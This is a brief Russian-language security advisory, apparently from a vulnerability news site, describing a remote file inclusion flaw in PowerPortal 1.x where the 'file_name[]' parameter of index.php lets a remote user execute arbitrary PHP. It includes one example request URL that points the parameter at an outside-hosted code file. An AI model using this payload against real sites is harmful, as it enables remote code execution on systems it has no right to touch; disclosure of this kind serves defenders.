Программа: PowerPortal 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "file_name[]" сценарием index.php.

Пример:

http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt?



Оставить мнение